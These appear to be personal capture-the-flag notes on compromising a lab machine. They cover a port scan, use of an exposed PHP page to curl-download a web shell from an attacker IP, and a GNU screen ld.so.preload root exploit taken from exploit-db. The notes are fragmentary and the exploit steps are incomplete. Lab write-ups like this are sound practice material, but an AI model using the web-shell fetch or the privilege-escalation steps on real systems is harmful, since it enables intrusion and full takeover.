PORT SCAN
# Nmap 7.93 scan initiated Thu Dec 15 01:16:36 2022 as: nmap -p- --min-rate 1000 -oN portscan.txt 10.10.10.24
Warning: 10.10.10.24 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.24
Host is up (0.29s latency).
Not shown: 65130 closed tcp ports (reset), 403 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Thu Dec 15 01:19:02 2022 -- 1 IP address (1 host up) scanned in 146.69 seconds
Web content discovery
uploads/exposed.php
exposed.php it might run as curl command
I found we can write some files in the machine.
http://[ip]/cmd.php -o cmd.php
www-data shell
We find the 2 flags in this machine :-)
Privilege escalation
https://www.exploit-db.com/exploits/41154
But I can’t run the binary with the high GLIBC versionGLIBC_2.34.
So I complie the files in Centos, and upload the libhax.so, and rootshell.
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed